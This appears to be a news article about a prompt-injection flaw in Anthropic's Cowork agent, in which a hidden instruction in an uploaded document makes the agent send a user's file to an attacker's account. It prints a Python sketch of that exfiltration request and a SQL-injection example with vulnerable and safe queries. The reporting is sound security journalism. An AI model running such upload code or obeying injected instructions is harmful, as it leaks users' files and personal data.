Contagious Claude Code bug Anthropic ignored promptly spreads to Cowork

Office workers without AI experience warned to watch for prompt injection attacks - good luck with that

The Register

Anthropic's tendency to wave off prompt-injection risks is rearing its head in the company's new Cowork productivity AI, which suffers from a Files API exfiltration attack chain first disclosed last October and acknowledged but not fixed by Anthropic.

PromptArmor, a security firm specializing in the discovery of AI vulnerabilities, reported on Wednesday that Cowork can be tricked via prompt injection into transmitting sensitive files to an attacker's Anthropic account, without any additional user approval once access has been granted.

The process is relatively simple and, as PromptArmor explains, part of an “ever-growing” attack surface - a risk amplified by Cowork being pitched at non-developer users who may not think twice about which files and folders they connect to an AI agent.

Cowork, launched in research preview on Monday, is designed to automate office work by scanning the spreadsheets and other everyday documents that desk workers handle.

To trigger the attack, all a potential victim needs to do is connect Cowork to a local folder containing sensitive information and upload a document carrying a hidden prompt injection - and voilà, when Cowork analyzes those files, the injected instructions fire.

PromptArmor's proof of concept had the injected prompt instruct Cowork to run a curl command against Anthropic's file upload API, authenticated with the attacker's API key, to upload the largest available file - making that file available to the attacker through their own Anthropic account. PromptArmor demonstrated this with a real estate file, which the simulated attacker was then able to query via Claude to retrieve financial information and PII of individuals mentioned in the document.
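For a sense of how little machinery the attack needs, here is a minimal Python sketch of a request with that shape, assuming the publicly documented beta Files API endpoint and headers; the key and file name are placeholders, and this is an illustration rather than PromptArmor's actual payload:

```python
import requests

# Hypothetical sketch of the request shape PromptArmor describes: the injected
# prompt has the agent upload a victim file to Anthropic's Files API, but
# authenticated with the ATTACKER's key, so the file lands in the attacker's account.
ATTACKER_API_KEY = "sk-ant-attacker-key"  # placeholder, attacker-controlled

with open("largest_file_in_connected_folder.xlsx", "rb") as f:  # placeholder file name
    resp = requests.post(
        "https://api.anthropic.com/v1/files",          # documented file upload endpoint
        headers={
            "x-api-key": ATTACKER_API_KEY,
            "anthropic-version": "2023-06-01",
            "anthropic-beta": "files-api-2025-04-14",  # Files API is a beta feature
        },
        files={"file": f},
    )
print(resp.status_code)  # on success, the file is retrievable from the attacker's account
```

The crux is that the upload endpoint accepts whichever API key it is handed, so the only thing deciding where the file ends up is the key the injected prompt supplies.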

The flaw follows the same basic Files API exfiltration playbook that security researcher Johann Rehberger reported to Anthropic back in October concerning Claude Code. Rehberger received a rather lukewarm response from Anthropic at the time - the company first closed his bug report, then conceded that a prompt injection attack could indeed trick its API into exfiltrating data, and advised that users simply be careful about what they connect to the bot.

We asked in October whether Anthropic would consider doing something as simple as, say, implementing an API-side check to make sure files weren't being transmitted to a different account, but Anthropic didn't respond.
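For what it's worth, such a check needn't be exotic. Purely as a hypothetical sketch - not anything Anthropic has described shipping - an egress filter in the agent's sandbox could refuse Anthropic API calls signed with a key other than the one the user's own session was provisioned with:

```python
# Hypothetical egress check, not Anthropic's implementation: only allow
# agent-initiated calls to the Anthropic API that authenticate as the user's own account.
from urllib.parse import urlparse

SESSION_KEYS = {"sk-ant-user-session-key"}  # placeholder: key(s) issued to this user's session

def allow_outbound(url: str, headers: dict[str, str]) -> bool:
    """Return True if the request may leave the sandbox."""
    if urlparse(url).hostname != "api.anthropic.com":
        return True  # non-Anthropic traffic is out of scope for this particular check
    # Block calls signed with a key that doesn't belong to this session -
    # exactly the move the exfiltration proof of concept relies on.
    return headers.get("x-api-key") in SESSION_KEYS
```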

Anthropic's response to the issue arising in Cowork seems to be a similar this-is-on-you-so-be-careful one, with the company noting in its Cowork announcement that prompt injection attacks are an issue. 

"We've built sophisticated defenses against prompt injections, but agent safety—that is, the task of securing Claude's real-world actions—is still an active area of development in the industry," Anthropic said. 

"These risks aren't new with Cowork, but it might be the first time you're using a more advanced tool that moves beyond a simple conversation," the company continued, as Cowork is an agentic tool with a much wider user scope than its previous tools. 

To mitigate these risks, Anthropic advises Cowork users to avoid connecting it to sensitive documents, to limit its Chrome extension to trusted sites, and to monitor it for "suspicious actions that may indicate prompt injection."

As developer and prompt injection worrier Simon Willison opined in his hands-on review of Cowork, that's a big ask for people unfamiliar with the intricacies of AI.

"I do not think it is fair to tell regular non-programmer users to watch out for 'suspicious actions that may indicate prompt injection,'" Willison said. 

Once is an accident, twice is a coincidence …

This isn't the first time Anthropic has argued a reported flaw wouldn't be patched.

Back in June 2025, Trend Micro disclosed that Anthropic's open-source reference SQLite MCP server implementation for connecting to external data sources contained a classic SQL injection flaw. Anthropic said the issue was out of scope because the GitHub repository containing the affected code had been archived in May 2025, and no patch was planned.
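The bug class is as old as dynamic SQL: user-supplied input spliced directly into a query string. As a generic illustration of the pattern in Python's sqlite3 - not the MCP server's actual code - the vulnerable and safe forms look like this:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'alice@example.com')")

def lookup_unsafe(name: str):
    # Vulnerable: attacker-controlled input is spliced straight into the SQL text,
    # so name = "x' OR '1'='1" matches every row.
    return conn.execute(f"SELECT * FROM users WHERE name = '{name}'").fetchall()

def lookup_safe(name: str):
    # Parameterized query: the driver binds the value, so it can't alter the query's structure.
    return conn.execute("SELECT * FROM users WHERE name = ?", (name,)).fetchall()

print(lookup_unsafe("x' OR '1'='1"))  # leaks all rows
print(lookup_safe("x' OR '1'='1"))    # returns nothing
```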

Unfortunately, that SQLite MCP server had already been forked or copied more than 5,000 times before it was archived, meaning the vulnerable code may still be circulating across a large number of downstream projects.

Anthropic told us in June that it disagreed with Trend Micro's analysis of the issue, and rather than shipping a fix for the archived code, pointed users to the MCP specification's guidance that a human should be watching and approving what the tool does.

"The MCP specification recommends human oversight for this type of tool – there should always be a human in the loop with the ability to deny tool invocations, meaning users would review these queries before execution," an Anthropic spokesperson told us last summer. 

PromptArmor's report may hinge on the same problem Rehberger reported last year, but Anthropic's language around prompt injection once again frames the risk as something users are expected to manage.

When asked what it was doing to address the API prompt injection issue, now present in two products, Anthropic told The Register that prompt injection is an industry-wide issue that everyone in the AI space is trying to solve. 

That said, an Anthropic spokesperson added that the company is also working on ways to minimize prompt injections in its products, including by using a virtual machine in Cowork designed to limit the platform's access to sensitive files and directories. Anthropic told us it plans to ship an update to the Cowork VM today to improve its interaction with the vulnerable API, with further security improvements to follow.

Anthropic also stressed that Cowork was being released as a research preview, and invited users to send feedback or security recommendations. ®